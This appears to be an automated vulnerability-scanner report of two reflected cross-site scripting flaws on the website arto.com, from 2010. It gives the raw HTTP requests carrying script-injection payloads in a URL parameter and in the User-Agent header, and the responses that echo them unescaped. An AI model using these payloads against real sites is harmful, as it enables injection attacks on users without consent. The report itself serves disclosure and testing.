1. Cross-site scripting (reflected)
1.1. http://www.arto.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.arto.com/ [User-Agent HTTP header]
Severity: | High |
Confidence: | Certain |
Host: | http://www.arto.com |
Path: | / |
GET /?14f37'-alert(1)- Host: www.arto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 24 Nov 2010 22:32:27 GMT Connection: close Content-Length: 69929 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... o_icon_16x16.gif', href: '/section/linkshare/?ln shareMenuDropDownMenu ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.arto.com |
Path: | / |
GET / HTTP/1.1 Host: www.arto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c03f8"><script>alert(1)< Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 24 Nov 2010 22:32:29 GMT Connection: close Content-Length: 69797 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c03f8"><script>alert(1)< ...[SNIP]... |